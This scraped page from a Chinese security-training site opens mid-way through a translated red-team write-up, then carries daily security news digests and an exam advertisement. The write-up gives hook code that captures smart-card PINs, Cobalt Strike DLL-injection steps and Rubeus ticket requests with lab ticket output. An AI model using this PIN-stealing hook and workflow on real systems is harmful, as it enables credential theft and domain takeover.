YiN0sODwCNkc8oPOC31qD++fBd/Al5bkctddqc9NG7ifaZHsoIQMWKGNnin4FUdK7tygEAoyQjR1rS2n
qUzupHBUQhl+p2rL652b1rxBEjguvR8HqCK5/KGeOwME3zYB1kXH7tvEHivm5akTz23NSGHPSx9mNeW2
7+74n3a35TYRSK2r7D+gzuvr/cH82PzUTSOce8sCqa7oJWFot01dOxxcH+269VHWdkhe69rZ+zUgkETy
40PZaHHkXYgI0ahhsYpJf++Zs+NO2ZMV6jncqlqivn3nzu7SA+pVyC9oE+Q8yX7NYml5pyVo8/Glo4He
MIHboAMCAQCigdMEgdB9gc0wgcqggccwgcQwgcGgGzAZoAMCARehEgQQ6tIiFytU5V2cgSpXt8skd6EP
Gw1IQUNLTEFCLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDIw
MTAwMjE1MDExMlqmERgPMjAyMDEwMDMwMTAxMTJapxEYDzIwMjAxMDA5MTUwMTEyWqgPGw1IQUNLTEFC
LkxPQ0FMqSIwIKADAgECoRkwFxsGa3JidGd0Gw1oYWNrbGFiLmxvY2Fs
ServiceName : krbtgt/hacklab.local
ServiceRealm : HACKLAB.LOCAL
UserName : Administrator
UserRealm : HACKLAB.LOCAL
StartTime : 02/04/2023 16:01:12
EndTime : 03/04/2023 02:01:12
RenewTill : 09/04/2023 16:01:12
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 6tIiFytU5V2cgSpXt8skdw==
那么由此产生的 .kirbi Base64 编码字符串也可用于从 KDC中获得正常的 TGS。
在我成功地在这个工具中使用了PKINIT之后,我开始思考我们该如何使用物理智能卡做认证。一旦用户的机器受到攻击破坏,那么使用智能卡进行认证最大的问题就是密码。如果不知道PIN码,那么我们就无法生成一个有效的AS-REQ。蛮力破解是不可行的,因为进行3次无效的尝试,那么系统就会先进行账号锁定。
其中的一个思路就是,当用户需要解锁智能卡时可以尝试捕获PIN码。这主要用于机器解锁或者登录网络上其他需要智能卡认证的服务。
经过一番调查,我发现了WinSCard DLL。这个DLL是与Smard Card服务通信的网关。然后这个服务就会控制智能卡的通信。一般来说,任何与Windows上的智能卡进行通信的东西都需要使用WinSCard API。
我所研究的WinSCard.dll中最重要的函数是SCardTransmit API。这个API是用于传输智能卡ISO/IEC 7816规范中所要求的应用协议数据单元(APDU)的API。这个是最底层的传输单元,主要是用于智能卡通信。
如果我们hook这个API,那么我们应该就能够监视传送到卡上的PDU。
LONG SCardTransmit(
SCARDHANDLE hCard,
LPCSCARD_IO_REQUEST pioSendPci,
LPCBYTE pbSendBuffer,
DWORD cbSendLength,
LPSCARD_IO_REQUEST pioRecvPci,
LPBYTE pbRecvBuffer,
LPDWORD pcbRecvLength
);
pbSendBuffer参数是向卡片发送的APDU数据包,而pbRecvBuffer则是智能卡返回的响应数据。
虽然ISO智能卡规范对某些命令类别和命令数据结构做出了限制,但这些限制通常是针对某些具体应用的,而不是由ISO智能卡规范本身定义的。并且为了满足身份访问的需求,NIST制定了个人身份验证(PIV)SP 800-73-4规范。该规范涵盖了智能卡应如何处理注册到设备上的证书,以及实现该规范的所有APU,这个不需要太多的细节。在PIV规范中最重要的是第3.2.1节VERIFY卡命令。这些内容阐述了VERIFY APDU是如何在允许访问存储在卡片上的私钥之前进行PIN的验证。
因此,有了ISO规范中的信息以及PIV规范中的3.2.1节,我们应该能够写一个hook程序来捕获传送到卡上的PIN。
DWORD WINAPI SCardTransmit_Hooked(SCARDHANDLE hCard,
LPCSCARD_IO_REQUEST pioSendPci,
LPCBYTE pbSendBuffer,
DWORD cbSendLength,
LPSCARD_IO_REQUEST pioRecvPci,
LPBYTE pbRecvBuffer,
LPDWORD pcbRecvLength) {
char debugString[1024] = { 0 };
DWORD result = pOriginalpSCardTransmit(hCard, pioRecvPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);
//Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {
//Check card response status for success
bool success = false;
if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
success = true;
}
char asciiPin[9];
sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false",
GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));
SendPINOverPipe(debugString);
}
return result;
}
API调用做的第一件事就是调用原始的SCardTransmit函数。我们不仅需要研究数据请求,而且还要知道卡的响应数据。这样我们就可以确定传送给卡片的PIN码是否正确。然后,该函数会查找VERIFY PDU来隔离验证PIN的命令。一旦我们确定了VERIFY PDU,那么我们就可以开始检查结果,0x90 0x00都表示PIN被审核。接下来,我们可以从发送缓冲区的偏移量5(PDU结构中的命令数据)的位置处提取PIN码。最后,我们需要通过一个命名管道来传输PIN码的详细信息,然后使用数据接收程序进行捕获。
我们可以将这一功能打包到一个DLL中,该DLL也能够进行反射性加载,那么我们可以将该DLL注入到我们所研究的进程中去。
Demo
假设在存在该漏洞的情况下,并且我已经有了一个Cobalt Strike信标连接到了受害者的工作站上。我所使用的是管理员账户,但其实普通用户的账户也可以进行使用。PinSwipe DLL也可以被注入到一个高权限的进程中,如lsass,当获得管理权限时,可以在登录时刷出PIN码,但使用普通用户身份进行访问时,你将会被限制在用户模式进程中,如Internet Explorer等等。
所以首先我们需要启动PinSwipeListener,这将可以dump出智能卡登录EKU的用户证书信息。
beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca
有了监听器,我们就需要选择将PinSwipe.dll注入到哪些进程中。像Internet Explorer、Chrome等都是很好的选择,因为在智能卡认证的环境中,这些程序会经常弹出请求PIN的信息。在这里,我运行的是Internet Explorer,它的PID是 2678。实际上,IE和Chrome一样,为浏览器的各种标签都启动了不同的子进程。所以你需要注入一个正确的进程。同时也可以使用其他更高级的攻击脚本,不断寻找新的IE进程并注入它们。
beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678
一旦用户在对话框中输入了他们的PIN码,PinSwipe就会捕获请求并通过命名管道将其发送给PinSwipeListener。
[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456
PinSwipe的输出除了显示输入的PIN号码外,还将显示输入的PIN是否正确。一旦你获取了PIN码,你就可以使用新的Rubeus功能来请求使用用户的物理智能卡进行TGT验证。这一次,我们可以使用/certificate参数来指定所要使用的证书的文件名。
beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
doIGAjCCBf6gAwIBBaEDAgEWooIFDzCCBQthggUHMIIFA6ADAgEFoQ8bDUhBQ0tMQUIuTE9DQUyiIjAg
oAMCAQKhGTAXGwZrcmJ0Z3QbDWhhY2tsYWIubG9jYWyjggTFMIIEwaADAgESoQMCAQKiggSzBIIEr6H1
bNWgmfBxlK7OILXLN4UcW50vCbU2ry2NA+d+VrLScEqcZBUcmv93C5DrxSRRPKXpKfyrvDc9NR5o0hR5
L21tDiNgcRJqTrg1ZnkLa79Ru5y8R8CylgLv8/aqjEmejdCIJ+uynJMYCrZPuxkeV+n3noGEKPHMK0ek
iDXz9CyteawxHlxLZQOV+NEcJ8KCV9DJQ2p/eLxFXeCDmogWVle7+tOSHie6LvqfxfeWtgMIrGBXUHBZ
ysdwqJSrFz8sJW9KCUVOLgHYvQZTkUtTsmclprvsRYYVSVY6eyRLeXPX8Ib9ewmQUrGLPazWdIWgtbei
BQV2IY+2h8o3BmsyMHOkXSkK42GwPobJo/OzJrbUDlB3+9PTyWUYukvqO2O73Hd5q9tkewx4rj+/vzNA
PwnMx+zTFFQqki5cF5R/oixISioVZi9dab+wSXSY5EH0bVyWS5G7aMBXrD0qnpiM4jiCgAAvtDEGqzSq
nS6H7BEn2c/RJVGHJDOK45lmrvmnqH1zjUzaIEAJg7OifV6KGlRbriSO3CFzOk2o4HJ9Ce2BW2OwFyoH
KzDGHrW+3jtHLgcd8Bvrt5TJpN6LOmEN3nn5LSeS0lXTJ2j9FEXuc0BOoOT+lyrBXMKVK30Ygisi17y4
j3m2QN+eFwk/TigUMXVYE0UMwMKmxu055jomdNrgSzLc0NrXT9sMIGrTOmdzOZa0LIOpVf0bb07wNy/N
to1dXNdxlU4abTBllKMypn90HFL+ygi6kTrgMyHZ8RF1u5CZv+FDnq8ksRykXfvM2av9gs4oiINeVzMr
dELTTnt4h0+mtw7QqceY53UANu3wSmyh65qAT4rrRs/dLU0D8T+0159VZxc4pvWvomZw+/v3KaMFQ3+O
cIDxFInYSn/fABW3mUZZzGFLuCUMCU9inmo6i7JVxYHOE4OcaqhJFgB3+yiJghGXq4Xsv7BWhJI7yMN7
wLf/0/epfMmbk7x6baDVsBHFe0MZXoEdRHhjcXydEVj4JqkGSawA1/lVO2TKJRj2Z5aBLOORI70/Jy76
y2ysovsvaFjefdq4ep0cRHsGMpvqlz//9i0rq5zEX3OD3kNfMcx9EwtEnfd99HMztLbhhJ8327K5fKCo
sI3iLMcjX+26O/hvvu3ssjOC3i4zmWcTtzhbPLJgLDOAKaL/qb5GMef85UFpvKx/irHysFGjiBr5IHAC
9+BFnIrE4uvd7IVfVMzq4O5VWXf4c6R2cxtfYfdtFmUUgmCrQoBji7P7fH3TP/T/0MZa/vDTv+xMgJTh
WSjXc9wnF5nuZ+5VufF6KQP6aizDYagASD7kpBCVyYU/65/0Kg6WuIl+gQWeJYiqJxQYSAV8UZoi7QX2
962Ci0xsE4XfvvsI3Grem9BTgxGoxauZWEO0jSQhyLbTHcJYoWCCG/cgKamZN2YG1J6bOpsrx8txogJS
W0zGy7tNw7pnUZyKCjx1j0TVU2BemZ/Gnwa1oX3aa7jdPGKJRMi5pg3k2Oy1RtX+ff7fuCTsBVVGMafc
LKFq4uhYtIKQYLArt4aRRAlzOWUiHBfAk1Moihn/AfACl5QwQVwoLRQtGXFjifHbSqHVJBIbxpdao4He
MIHboAMCAQCigdMEgdB9gc0wgcqggccwgcQwgcGgGzAZoAMCARehEgQQ5K2V8xIaGbUS8ZYqTl120aEP
Gw1IQUNLTEFCLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDIw
MTAwNDE4NTUyOVqmERgPMjAyMDEwMDUwNDU1MjlapxEYDzIwMjAxMDExMTg1NTI5WqgPGw1IQUNLTEFC
LkxPQ0FMqSIwIKADAgECoRkwFxsGa3JidGd0Gw1oYWNrbGFiLmxvY2Fs
ServiceName : krbtgt/hacklab.local
ServiceRealm : HACKLAB.LOCAL
UserName : Administrator
UserRealm : HACKLAB.LOCAL
StartTime : 04/04/2023 19:55:29
EndTime : 05/04/2023 05:55:29
RenewTill : 11/04/2023 19:55:29
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 5K2V8xIaGbUS8ZYqTl120Q==
那么到此结束。你现在已经有了一个TGT,并且可以在7天内申请新的TGS票,然后访问其他的网络资源。
当你在网络中使用物理智能卡时,最好的办法是拥有需要手动按键的卡,或者最好是生物识别阅读器。这样一来,对用户账户进行的任何攻击都不会产生TGT数据,因为智能卡会在没有物理按键或生物识别数据存在的情况下阻止对私钥的访问。
网络安全日报 2023年05月15日
1、研究人员发现更隐蔽的Linux BPFDoor恶意软件版本
https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/ 研究人员近期发现Linux恶意软件“BPFDoor”的一种新的、更隐蔽的变体,具有更强大的加密和反向shell通信。BPFDoor是一种隐蔽的后门恶意软件,至少从2017年开始活跃,但直到大约12个月前才被安全研究人员发现。该恶意软件的名称来源于使用“Berkley 数据包过滤器”(BPF)在绕过传入流量防火墙限制的同时接收指令。BPFDoor旨在允许威胁行为者在被破坏的
2、9个勒索软件团伙使用Babuk代码加密VMWare ESXi服务器
https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/ 越来越多的勒索软件团伙正在采用泄露的Babuk勒索软件源代码来创建针对VMware ESXi服务器的Linux加密器。SentinelLabs安全研究人员在发现2022年下半年至2023年上半年之间连续出现的九种基于Babuk的勒索软件变体后,观察到了这一上升趋势。SentinelLabs威胁研究员Alex Delamotte表示:
3、瑞士大型跨国企业ABB遭受Black Basta勒索软件攻击
https://www.bleepingcomputer.com/news/security/multinational-tech-firm-abb-hit-by-black-basta-ransomware-attack/ 领先的电气化和自动化技术提供商瑞士跨国公司ABB遭受了Black Basta勒索软件攻击,据报道影响了业务运营。ABB总部位于瑞士苏黎世,拥有约105000名员工,2022年的收入为294亿美元。作为其服务的一部分,该公司为制造和能源供应商开发工业控制系统(ICS)和SCADA系统。5月7日,该公司成为2022年4月浮出水面的网络犯罪组织Black Basta发起的勒索
4、Brightly Software通知客户SchoolDude平台数据被攻击者窃取
https://www.bleepingcomputer.com/news/security/brightly-warns-of-schooldude-data-breach-exposing-credentials/ 美国科技公司和西门子子公司Brightly Software通知客户,他们的个人信息和凭据被获得其SchoolDude在线平台数据库访问权限的攻击者窃取。SchoolDude是一个基于云的平台,用于管理来自学区多达600000名学生的7000多所学院、大学使用的工单。公司的其他SaaS解决方案被全球12000多家组织使用,其中大部分来自美国、加拿大、英国和澳大利亚。该事件涉及
5、微软强制号码匹配以对抗MFA疲劳攻击
https://www.bleepingcomputer.com/news/microsoft/microsoft-enforces-number-matching-to-fight-mfa-fatigue-attacks/ Microsoft已开始在Microsoft Authenticator推送通知中强制执行号码匹配,以抵御多重身份验证(MFA)疲劳攻击。在此类攻击(也称为推送轰炸或MFA推送垃圾邮件)中,网络犯罪分子向目标发送大量移动推送通知,要求他们批准使用窃取的凭据登录其公司帐户的尝试。在许多情况下,目标会屈服于重复的恶意MFA推送请求,要么是错误的,要么是为了停止看似无穷无尽的
6、BlackSuit勒索软件针对Windows和Linux用户发起攻击
https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/ Cyble Research and Intelligence Labs(CRIL)观察到,启动Linux变体(例如Cylance和Royal勒索软件)的勒索软件组织数量有所增加。这可以归因于这样一个事实,即Linux被广泛用作各个领域的操作系统,包括企业环境和云计算平台。Linux的广泛使用使其成为勒索软件组织的一个有吸引力的目标,因为一次攻击可能会危及多个系统。根据研究人员的观察,已发现BlackSuit Linu
7、Bl00dy勒索软件利用PaperCut漏洞针对教育机构发起攻击
https://www.bleepingcomputer.com/news/security/fbi-bl00dy-ransomware-targets-education-orgs-in-papercut-attacks/ FBI和CISA发布了一份联合公告,警告Bl00dy勒索软件团伙现在也在积极利用PaperCut远程代码执行漏洞来获得对网络的初始访问权限。美国网络安全和基础设施安全局提到,威胁行为者将攻击重点放在了教育部门,该部门公开暴露了该漏洞。PaperCut漏洞被追踪为CVE-2023-27350,是影响PaperCut MF和PaperCut NG的严重远程代码执行 (RCE
8、丰田披露200万客户汽车位置数据泄露长达十年
https://www.bleepingcomputer.com/news/security/toyota-car-location-data-of-2-million-customers-exposed-for-ten-years/ 丰田汽车公司披露了其云环境的数据泄露事件,从2013年11月6日到2023年4月17日,这十年间暴露了2150000名客户的汽车位置信息。根据该公司日本新闻编辑室发布的安全通知,数据泄露是由于数据库配置错误导致任何人无需密码即可访问其内容。该事件暴露了2012年1月2日至2023年4月17日期间使用该公司T-Connect G-Link、G-Link Lite
9、RapperBot 僵尸网络的最新变种增加了加密劫持功能
https://securityaffairs.com/146207/malware/rapperbot-botnet-adds-cryptojacking.html FortiGuard 实验室的研究人员发现了 RapperBot 僵尸网络的新样本,该样本增加了加密劫持功能。
10、Discord披露一起由于第三方代理遭到入侵导致的数据泄露事件
https://securityaffairs.com/146171/data-breach/discord-suffered-data-breach.html Discord正在通知用户在第三方支持代理的帐户遭到入侵后发生的数据泄露事件。安全漏洞暴露了代理的支持票队列,其中包含用户电子邮件地址、与Discord支持交换的消息以及作为票的一部分发送的任何附件。Discord表示,一旦事件被发现,它会立即通过禁用支持帐户来解决被破坏的支持帐户。“由于事件的性质,您的电子邮件地址、客户服务消息的内容以及您与Discord之间发送的任何附件可能已经暴露给第三方,”Discord在发给受影响用户的信
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
喜讯 | 蚁景科技成为国家信息安全水平考试(NISP)授权运营机构
经国家信息安全水平考试(NISP)管理中心授权,蚁景科技正式成为国家信息安全水平考试授权运营机构,具备组织、实施和培训NISP的相关资格。
▲NISP授权运营机构
关于NISP
1. NISP介绍
NISP全称为国家信息安全水平考试,是中国信息安全测评中心实施培养国家网络空间安全人才的项目。根据认证对象的专业基础,NISP分为一级、二级、三级(专项)三个级别,通过信息安全水平考试,全面了解和提升信息安全意识,通过三个级别的考试,快速进入网络空间安全行业。
▲NISP证书样式
2. 考证优势
(1)国家级证书,提高应聘者在信息安全行业的竞争力。
(2)NISP认证涵盖了从基础知识到实践应用的各个方面,可以帮助你更全面地掌握信息安全知识和技能,适应企业的需求。
(3)具备更强的信息安全意识、操作技能和管理经验,从而让你有更广阔的职业发展前景。
(4)在校生还可持该证书可换取学分或申领奖学金。(具体需参考学校规定)
3. 政策补贴
为推动人才的培养与发展,满足市场需要,各地纷纷出台了相关政策,针对考取“国家信息安全水平考试(NISP)二级证书”给予补贴。
▲某地政策补贴截图
报名NISP考试
NISP一级
【报考条件】年满16周岁的中国籍公民
【学习方式】线上学习
【考试形式】在线考试,每月一次
【考试费用】¥480
NISP二级
【报考条件】信息安全或网络安全本专业,或已参加一级考试并且考试通过
【学习方式】线上学习
【考试形式】就近城市安排线下考试
【考试费用】¥4800
扫码报名
扫描识别下方二维码,获取报名步骤
网络安全日报 2023年05月12日
1、朝鲜APT组织入侵了首尔国立大学医院窃取数据
https://www.bleepingcomputer.com/news/security/north-korean-hackers-breached-major-hospital-in-seoul-to-steal-data/ 韩国国家警察厅(KNPA)警告说,朝鲜黑客入侵了该国最大的医院之一首尔国立大学医院(SNUH)的网络,以窃取敏感的医疗信息和个人详细信息。该事件发生在2021年5月至6月之间,警方在过去两年中进行了分析调查,以确定肇事者。韩国当地媒体将这次袭击与Kimsuky黑客组织联系起来,但警方的报告并未明确提及具体的威胁组织。攻击者使用韩国等国的七台服务器对医院内部网络发起
2、新的"Greatness"网络钓鱼即服务针对 Microsoft 365 帐户
https://www.securityweek.com/new-greatness-phishing-as-a-service-targets-microsoft-365-accounts/ 思科的 Talos 安全团队警告说,大约一年来,一种新的网络钓鱼即服务 (PaaS) 产品已被用于针对制造、医疗保健、技术和房地产行业的 Microsoft 365 帐户。该服务被称为“ Greatness ”,自 2022 年年中以来已被用于多次网络钓鱼活动,主要针对美国的组织,其他受害者则来自英国、澳大利亚、加拿大和南非。
3、谷歌通过新的 API 提高 Android 的安全性
https://www.securityweek.com/google-improves-android-security-with-new-apis/ 谷歌正在通过新的安全浏览实时 API、凭证管理器 jetpack API 和面向开发人员的新 SDK API 来提高 Android 的安全性。在本周的谷歌 I/O 开发者大会上,谷歌分享了 Android 14 安全改进的详细信息,其中包括一系列用于更安全的在线浏览、登录和恶意软件保护的 API。
4、研究人员披露允许黑客入侵 Netgear 路由器的漏洞利用链详情
https://www.securityweek.com/details-disclosed-for-exploit-chain-that-allows-hacking-of-netgear-routers/ 工业和物联网网络安全公司 Claroty 周四披露了五个漏洞的详细信息,这些漏洞可以链接到一个漏洞利用中,可能允许威胁行为者入侵某些 Netgear 路由器。
5、美政府调查罗克韦尔自动化中国业务的网络安全风险
https://www.securityweek.com/us-probing-cybersecurity-risks-of-rockwell-automations-china-operations-report/ 据《华尔街日报》报道,美国政府的多个部门参与了一项调查,重点是美国工业巨头罗克韦尔自动化在中国的业务所带来的潜在网络安全风险。
6、被判70年!Twitter 2020网络攻击策划者认罪
https://thehackernews.com/2023/05/mastermind-behind-twitter-2020-hack.html 一名英国国民已承认与 2020 年 7 月的 Twitter 攻击有关,该攻击影响了众多知名账户并欺骗了该平台的其他用户。
7、APP、小程序个人信息保护调查!拒绝授权,九成多不能正常用
https://mp.weixin.qq.com/s/1bRbh973nWaAqYYXVDzmug 5月9日,四川省保护消费者权益委员会发布《消费者个人信息保护情况调查报告》,72.24%的受访者表示个人信息曾被泄露APP、小程序过度索权严重,“安全隐私协议”太过霸道。拒绝非必要授权后,九成应用程序限制使用。
8、欧盟被告知需加强监管包括Pegasus在内的间谍软件
https://cybernews.com/security/pegasus-spyware-eu-regulation/ 欧洲议会特别委员会在长达一年的调查后表示,间谍软件被用来监视、恐吓和诋毁欧盟部分地区的反对者、记者和民间社会。
9、新的 APT 组织 Red Stinger 瞄准东欧的军事和关键基础设施
https://thehackernews.com/2023/05/new-apt-group-red-stinger-targets.html 自 2020 年以来,一个名为Red Stinger的先前未被发现的高级持续威胁 (APT) 攻击者与针对东欧的攻击有关。
10、安天发布yayaya Miner挖矿木马分析报告
https://mp.weixin.qq.com/s/UYdze4yt2OoWoTcK0qY3Mw 安天CERT捕获了一批活跃的挖矿木马样本,该挖矿木马主要利用SSH弱口令暴力破解对Linux平台进行攻击。由于其初始攻击脚本中多次出现“yayaya”字符串,且在Linux内核模块中会隐藏包含该字符串的所有信息,因此安天CERT将该挖矿木马命名为“yayaya Miner”。yayaya Miner挖矿木马使用shc工具加密初始攻击脚本,利用该工具可以把Shell脚本转换成二进制可执行文件(ELF),使用RC4加密算法对其进行加密,初始攻击脚本文件会删除系统日志、创建yayaya等目录、删除特
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

